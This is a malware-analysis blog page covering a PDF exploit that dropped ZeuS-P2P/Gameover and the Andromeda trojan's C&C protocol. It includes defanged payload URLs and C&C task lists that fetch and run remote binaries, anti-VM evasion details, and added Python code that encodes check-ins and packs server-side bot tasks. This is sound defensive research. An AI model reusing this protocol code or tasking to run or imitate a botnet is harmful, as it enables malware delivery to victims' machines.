<pre><span style="font-size: smaller;">hxxp://dr-gottlob-institut.de/11.exe (91aa1168489a732ef7a70ceedc0c3bc9)<br />hxxp://filling-machine-india.com/images/1.exe (5ce7451cce4593698688bd526bfcec78)</span></pre><p>&nbsp; <br />
After the execution of the first binary the system was downloading:<br />
&nbsp;</p>
<pre><span style="font-size: smaller;">hxxp://pgalvaoteles.pt/111 (91d33fc439c64bd517f4f10a0a4574f1)<br />hxxp://files.karamellasa.gr/tvcs_russia/2.exe (e070ff758c2af2eee89f4a0f50077e30)</span></pre><p>&nbsp;</p>
<div class="rtejustify">The binary 91d33fc439c64bd517f4f10a0a4574f1 was dropping <a href="http://nakedsecurity.sophos.com/2014/02/27/notorious-gameover-malware-gets-itself-a-kernel-mode-rootkit/">ZeuS-P2P/Gameover with the Necurs rootkit</a>, but the size was unusually big (496,128 bytes). Inside the rootkit a PDB path related to GMER could be found (&ldquo;<em>e:\projects\cpp\gmer\driver\objfre_wxp_x86\i386\gmer.pdb</em>&rdquo;), probably used to disable the rootkit detection.</div>
<p>
After that, another loader was downloaded and executed:<br />
&nbsp;</p>
<pre><span style="font-size: smaller;">hxxp://www.shu-versicherungsvergleich.de/loader.exe</span></pre><p>&nbsp;</p>
<div class="rtejustify">From this point and after connecting to <em>pimplelotion.com</em> (95.163.104.88) to receive instructions a lot of binaries were executed. This is an example of the configuration received from this server:</div>
<p>&nbsp;</p>
<pre><span style="font-size: smaller;">&lt;?xml version=&quot;1.0&quot;?&gt;<br />&lt;config&gt;<br />&lt;interval&gt;10&lt;/interval&gt;<br />&lt;timeout&gt;5&lt;/timeout&gt;<br />&lt;urls&gt;hxxp://95.163.104.88&lt;/urls&gt;<br />&lt;country&gt;Netherlands&lt;/country&gt;<br />&lt;tasks&gt;<br />&lt;install id=&quot;1&quot; filetype=&quot;1&quot; name=&quot;soks&quot; autorun=&quot;1&quot; limits=&quot;0:16632&quot; filter=&quot;&quot; hash=&quot;2368a8c8b50900d57c0366049f755c05&quot;&gt;hxxp://segurgestion.es/1.bin&lt;/install&gt;<br />&lt;/tasks&gt;<br />&lt;/config&gt;</span></pre><p>&nbsp;<br />
And this is the list of URLs I had collected until I stopped monitoring it:<br />
&nbsp;</p>
<pre><span style="font-size: smaller;">hxxp://adventiaingenieria.es/222<br />hxxp://segurgestion.es/1.bin<br />hxxp://golestangallery.com/333%283%29.exe<br />hxxp://intropitch.com/1.bin<br />hxxp://regleg.eu/images/777.exe</span></pre><p>&nbsp; </p>
<div class="rtejustify">So it was funny (and weird) to receive a PDF exploit directly via email, and not the usual downloader like Andromeda/Upatre to drop ZeuS-P2P/Gameover (among others). Also, it was the first time I saw this vulnerability in the wild, because, as far as I know, <a href="http://contagiodump.blogspot.nl/2010/06/overview-of-exploit-packs-update.html">it is not used in any Exploit Kit either</a>. If I am wrong and you think this vuln is common, feel free to drop a comment ;)</div>
<p></p>
<p>Tags: Botnets, Exploits, Gameover, Malware, PDF, peepdf, Spam, Vulnerabilities, ZeuS-P2P. Published Tue, 20 May 2014 21:51:20 +0000 by jesparza (http://eternal-todo.com/blog/cve-2013-2729-exploit-zeusp2p-gameover#comments).</p>
<p>Yet another Andromeda / Gamarue analysis (http://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis)</p>
<p>Some days ago I read the <a href="http://joe4security.blogspot.nl/2013/08/anti-vm-gone-wrong.html">post about Joe Security's error when they analyzed an Andromeda sample</a> and I also found new samples of this Trojan. Then I decided that I should write something about it. At least, just to remember some tricks of Andromeda for the next time and not starting from scratch. <a href="http://www.youtube.com/watch?v=NOnPbNfKcds">I'm Dory, I forget things ;)</a></p>
<p>When I analyzed this malware some months ago I thought that it was quite interesting due to the Anti-debugging and Anti-VM tricks it uses. You can also find references to <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/gamarue-malware-goes-to-germany/">the same malware with the name of Gamarue</a>. It seems it is cool to rename the same malware with different names. Then you can find some families with three different names, like Cridex / Feodo / Bugat. Anyway, I also found these two links with very good and detailed information about analyzing Andromeda:<br />
&nbsp;</p>
<ul>
<li><a href="http://touchmymalware.blogspot.nl/2012/11/andromeda-v24.html"><strong>Andromeda v2.4 on </strong><em><strong>Touch My Malware</strong></em></a></li>
<li><a href="http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/"><strong>Fooled by Andromeda on</strong> <em><strong>0xEBFE</strong></em></a></li>
</ul>
<p>&nbsp;<br />
I have mostly seen using Andromeda to install banking malware, like <strong>Ice-IX</strong>, <strong>Citadel</strong> and <strong>Sinowal / Torpig</strong> (if it doesn't have more than one name it is not cool). But as you can see in this post on <a href="http://malware.dontneedcoffee.com/2012/07/inside-andromeda-bot-v206-webpanel-aka.html"><em><strong>Malware don't need Coffee</strong></em></a> it can be bought with different plugins too. If the main objective is just stealing credentials then maybe with the <em>Keylogger</em> or <em>Formgrabber</em> plugins plus the <em>Rootkit</em> one (<em>&quot;r.pack&quot;</em>) to stay stealth can be ok. I also saw Andromeda downloading a plugin called <em>&quot;pony&quot;</em>. It was nothing but the infamous Trojan <strong>Pony Loader / Fareit</strong>, which I mentioned when I talked about <a href="http://eternal-todo.com/blog/boston-bombings-redkit-fareit-pony-kelihos-ransomware">the Boston Marathon bombings malware campaign</a>. However, if the objective of the cybercriminals is spread another malware then the function of Andromeda will be as a simple downloader. It is also possible using it for both objectives, of course.</p>
<p>The infection vector that I have seen is just SPAM. It comes zipped and attached to an email message with different subjects like discounts, hotel offers or post mail messages:<br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/pixmania_spam.png" target="_blank"><img width="425" height="322" border="0" src="/eternal_files/uploads/pixmania_spam_0.png" alt="Andromeda Pixmania Spam" /></a></div>
<p>&nbsp; <br />
The generated traffic of Andromeda can be easily spotted:<br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/post_andromeda.png" target="_blank"><img width="400" height="226" border="0" src="/eternal_files/uploads/post_andromeda_0.png" alt="Andromeda HTTP Post" /></a></div>
<p>&nbsp;</p>
<div class="rtecenter"><a href="/eternal_files/uploads/post_andromeda_august.png" target="_blank"><img width="400" height="226" border="0" src="/eternal_files/uploads/post_andromeda_august_0.png" alt="Andromeda HTTP Post" /></a></div>
<p>&nbsp; <br />
It is just an HTTP POST request using the User-Agent <strong>&ldquo;Mozilla/4.0&rdquo;</strong> and sending a Base64-encoded string. After decoding it, it is also necessary to decrypt it with RC4 using a specific key. In the first case it was using a <a href="https://www.google.com/search?q=d40e75961383124949436f37f45a8cb6+andromeda">default installation key,&nbsp; <strong>&quot;</strong><em><strong>d40e75961383124949436f37f45a8cb6</strong></em></a><strong>&quot;</strong>. The information sent by the Trojan has the format &ldquo;<em>id:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%lu</em>&rdquo;. This is an example:<br />
&nbsp;</p>
<pre><span style="font-size: smaller;">id:753485172|bid:3|bv:518|sv:1281|pa:0|la:2196749529|ar:1</span></pre><p>&nbsp;<br />
The meaning of the different parameters is the following:<br />
&nbsp; </p>
<ul>
<li><em><strong>id</strong></em>: Bot ID</li>
<li><em><strong>bid</strong></em>: Build number</li>
<li><em><strong>bv</strong></em>: Bot version</li>
<li><em><strong>sv</strong></em>: OS version</li>
<li><em><strong>pa</strong></em>: Boolean to say if it is a x64 platform</li>
<li><em><strong>la</strong></em>: IP (long)</li>
<li><em><strong>ar</strong></em>: Boolean to say if it is executed with the Administrator account</li>
</ul>
<p>&nbsp; <br />
The response is encrypted with RC4 too. However, in this case the key is the Bot ID sent previously. Four more bytes are prepended to the encrypted data: the CRC32 of the content. Depending on the Trojan version an additional Base64 encoding can be applied before encrypting with RC4. The response content is the list of tasks to be executed by the bot (if there are any): for instance, updating the bot binary, installing new plugins, executing an additional executable/DLL, killing the bot, etc. This is an example of a response:<br />
&nbsp;</p>
<pre><span style="font-size: smaller;"> 00000000 0f 00 00 00 02 01 00 00 00 68 74 74 70 3a 2f 2f |.........http://|<br /> 00000010 63 6c 6f 74 68 65 73 73 68 6f 70 75 70 70 79 2e |clothesshopuppy.|<br /> 00000020 63 6f 6d 2f 70 6c 75 67 2f 72 2e 70 61 63 6b 00 |com/plug/r.pack.|<br /> 00000030 02 02 00 00 00 68 74 74 70 3a 2f 2f 63 6c 6f 74 |.....http://clot|<br /> 00000040 68 65 73 73 68 6f 70 75 70 70 79 2e 63 6f 6d 2f |hesshopuppy.com/|<br /> 00000050 70 6c 75 67 2f 70 6f 6e 79 00 02 03 00 00 00 68 |plug/pony......h|<br /> 00000060 74 74 70 3a 2f 2f 63 6c 6f 74 68 65 73 73 68 6f |ttp://clothessho|<br /> 00000070 70 75 70 70 79 2e 63 6f 6d 2f 70 6c 75 67 2f 70 |puppy.com/plug/p|<br /> 00000080 63 62 00 01 14 00 00 00 68 74 74 70 3a 2f 2f 75 |cb......http://u|<br /> 00000090 74 61 68 62 6c 69 6e 64 73 2e 69 65 2f 63 69 74 |tahblinds.ie/cit|<br /> 000000a0 61 2e 65 78 65 00 00 0a |a.exe...| <br /> </span></pre><p>&nbsp;<br />
The first four bytes are the request rate and then there is an array of tasks to execute. The format of each task is &ldquo;<em>Command ID (1 byte) &ndash; Task ID (4 bytes) &ndash; Parameter (X bytes)</em>&rdquo;. In this example we can see that the command to install a new plugin is <em>0x02</em> and to execute a new binary is <em>0x01</em>. In both cases the parameter is a URL.</p>
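<p>The check-in and task protocol just described, as an added Python model (not Andromeda's own code). The RC4 key and the check-in string are the ones from this post and the task bytes are the decrypted response shown in the hex dump above, byte for byte; what the post does not pin down is filled in as labelled assumptions: the response key is the decimal bot ID as an ASCII string, the CRC32 covers the content that gets encrypted and is stored little-endian, and a zero command byte terminates the task list.</p>

```python
"""Andromeda check-in (base64(RC4(key, fields))) and task response
(crc32 || RC4(bot_id, tasks)) as a runnable model. Added example; assumptions
are marked inline."""
import base64
import struct
import zlib

# Default installation key seen in the first sample (from the post).
DEFAULT_KEY = b"d40e75961383124949436f37f45a8cb6"
# Example check-in string from the post.
CHECKIN_EXAMPLE = "id:753485172|bid:3|bv:518|sv:1281|pa:0|la:2196749529|ar:1"
# The decrypted response shown in the post's hex dump.
RESPONSE = bytes.fromhex(
    "0f0000000201000000687474703a2f2f" "636c6f7468657373686f70757070792e"
    "636f6d2f706c75672f722e7061636b00" "0202000000687474703a2f2f636c6f74"
    "68657373686f70757070792e636f6d2f" "706c75672f706f6e7900020300000068"
    "7474703a2f2f636c6f7468657373686f" "70757070792e636f6d2f706c75672f70"
    "6362000114000000687474703a2f2f75" "746168626c696e64732e69652f636974"
    "612e65786500000a")
CMD_NAMES = {0x01: "download and execute", 0x02: "install plugin"}


def rc4(key, data):
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def build_checkin(bot_id, build, bot_version, os_version, is_x64, ip_long, is_admin):
    """The bot's format string: id:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%lu."""
    return "id:%d|bid:%d|bv:%d|sv:%d|pa:%d|la:%d|ar:%d" % (
        bot_id, build, bot_version, os_version, is_x64, ip_long, is_admin)


def encode_checkin(text, key=DEFAULT_KEY):
    """POST body: Base64 of the RC4-encrypted check-in string."""
    return base64.b64encode(rc4(key, text.encode()))


def decode_checkin(body, key=DEFAULT_KEY):
    """What you do with a captured POST: Base64-decode, then RC4 with the install key."""
    return rc4(key, base64.b64decode(body)).decode()


def parse_checkin(text):
    return dict(field.split(":", 1) for field in text.split("|"))


def parse_tasks(data):
    """First 4 bytes: request rate. Then tasks of 'cmd (1 byte) | task id (4 bytes,
    LE) | NUL-terminated parameter', a URL for the two commands seen in the post."""
    rate = struct.unpack_from("<I", data, 0)[0]
    tasks, pos = [], 4
    while pos < len(data):
        cmd = data[pos]
        if cmd == 0:                       # assumption: a zero command ends the list
            break
        task_id = struct.unpack_from("<I", data, pos + 1)[0]
        end = data.index(b"\x00", pos + 5)
        tasks.append((cmd, task_id, data[pos + 5:end].decode()))
        pos = end + 1
    return rate, tasks


def response_key(bot_id):
    return str(bot_id).encode()            # assumption: decimal bot id as ASCII


def pack_response(plaintext, bot_id, inner_base64=False):
    """Server side: optional Base64 layer (newer versions), RC4 with the bot id,
    CRC32 of the encrypted content prepended (assumed little-endian)."""
    body = base64.b64encode(plaintext) if inner_base64 else plaintext
    crc = struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)
    return crc + rc4(response_key(bot_id), body)


def unpack_response(blob, bot_id, inner_base64=False):
    """Bot side; None when the CRC does not match (wrong key or tampered data)."""
    body = rc4(response_key(bot_id), blob[4:])
    if struct.unpack("<I", blob[:4])[0] != zlib.crc32(body) & 0xFFFFFFFF:
        return None
    return base64.b64decode(body) if inner_base64 else body


if __name__ == "__main__":
    print("POST body:", encode_checkin(CHECKIN_EXAMPLE).decode())
    rate, tasks = parse_tasks(RESPONSE)
    print("request rate:", rate)
    for cmd, task_id, url in tasks:
        print(f"  task {task_id}: {CMD_NAMES.get(cmd, hex(cmd))} -> {url}")
    blob = pack_response(RESPONSE, 753485172)
    print("round trip ok:", unpack_response(blob, 753485172) == RESPONSE)
```

<p>For a captured session you only need <em>decode_checkin</em> with the key pulled from the sample, and <em>parse_tasks</em> on the decrypted response; the <em>pack_response</em> side is there so the CRC and key assumptions can be exercised end to end and adjusted if a sample disagrees with them.</p>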
<p>If you have a clean sample of Andromeda (after unpacking/decrypting), then you can use IDA Pro and the <a href="https://github.com/0xEBFE/Andromeda-payload">IDAPython script</a> created by <a href="https://twitter.com/0x0000EBFE">0xEBFE</a> to <a href="http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/">decrypt and decompress the payloads</a>. This way you can find the RC4 key used to encrypt the communications and the potential plugins:<br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/decrypt_plugin_ida.png" target="_blank"><img width="425" height="236" border="0" src="/eternal_files/uploads/decrypt_plugin_ida_0.png" alt="Andromeda Plugin Decryption" /></a></div>
<p>&nbsp; <br />
Another way to find the RC4 key is to take a look at the memory of the processes created by Andromeda. Although the URL you can see in the following screenshot is not the real one, the key is valid.<br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/key_in_memory_2.png" target="_blank"><img width="425" height="311" border="0" src="/eternal_files/uploads/key_in_memory_2_0.png" alt="Andromeda RC4 Key" /></a></div>
<p>&nbsp; <br />
It was funny to see a really nice C&amp;C domain being used in one of the analyzed samples, &ldquo;<em><strong>thisshitismoresafethanpentagonfuckyoufedsbecausethisisaf.com/image.php</strong></em>&rdquo;:<br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/feds_message.png" target="_blank"><img width="425" height="340" border="0" src="/eternal_files/uploads/feds_message_0.png" alt="Andromeda Feds message" /></a></div>
<p>&nbsp; <br />
However, it was nothing but a cool message, because this domain was modified later using XOR to obtain the real C&amp;C endpoint. <br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/url_dexored.png" target="_blank"><img width="425" height="274" border="0" src="/eternal_files/uploads/url_dexored_0.png" alt="Andromeda URL dexored" /></a></div>
<p>&nbsp; <br />
One thing that is not mentioned in the other analyses is that this Trojan also creates hooks in the functions <em>NtQueryInformationProcess</em>, <em>NtOpenProcess</em> and <em>RtlRaiseException</em> of the new process (<em>wuauclt.exe</em>, in this case):<br />
&nbsp; </p>
<div class="rtecenter"><a href="/eternal_files/uploads/gmer_clean_hooks.png" target="_blank"><img width="400" height="259" border="0" src="/eternal_files/uploads/gmer_clean_hooks_0.png" alt="Andromeda hooks" /></a></div>
<p>&nbsp; <br />
You can find below a summary of the techniques used to hinder analysis:</p>
<ul>
<li>Breakpoint detection</li>
<li>Custom exception handler to load the real payload</li>
<li>Check if certain DLLs are loaded in the system: <em>guard32.dll</em> (<em>Comodo Firewall</em>) and <em>sbiedll.dll</em> (<em>Sandboxie</em>).</li>
<li>Check if some forbidden processes are running: <em>vmwareuser.exe, vboxservice.exe, procmon.exe, wireshark.exe</em>, etc.</li>
<li>Comparison between the main disk ID (<em>system\currentcontrolset\services\disk\enum@0</em>) and the strings &ldquo;<em>vmwa</em>&rdquo;, &ldquo;<em>vbox</em>&rdquo; and &ldquo;<em>qemu</em>&rdquo;.</li>
<li>Time execution check using the instruction <a href="http://faydoc.tripod.com/cpu/rdtsc.htm"><strong>RDTSC</strong></a>.</li>
</ul>
<p>&nbsp; <br />
Most of these checks can be bypassed if the CRC32 checksum of the system drive volume name is <strong>0x20C7DD84</strong>. It seems that the bad guy was using a test environment and this was the way he checked that the Trojan was running correctly. However, modifying the system drive volume name is not the only way to get Andromeda running, <a href="http://joe4security.blogspot.ch/2013/08/anti-vm-gone-wrong.html">as Joe Security's guys were suggesting (&ldquo;<em>The real payload is <strong>only</strong> shown if the volumn name of the system drive equals a&nbsp;specific checksum</em>&rdquo;)</a>. If the environment is able to pass all the checks mentioned above, the real payload will be executed as well. Sometimes the malware did not execute correctly in my virtual machine, as Joe Security's post says, but I think the cause is that the machine was probably overloaded and so it did not pass the time check. </p>
<p>Tags: Analysis, Andromeda, Banks, Botnets, Citadel, Fraud, Malware, Pony Loader, Reversing. Published Sun, 01 Sep 2013 17:56:09 +0000 by jesparza (http://eternal-todo.com/blog/yet-another-andromeda-gamarue-analysis#comments).</p>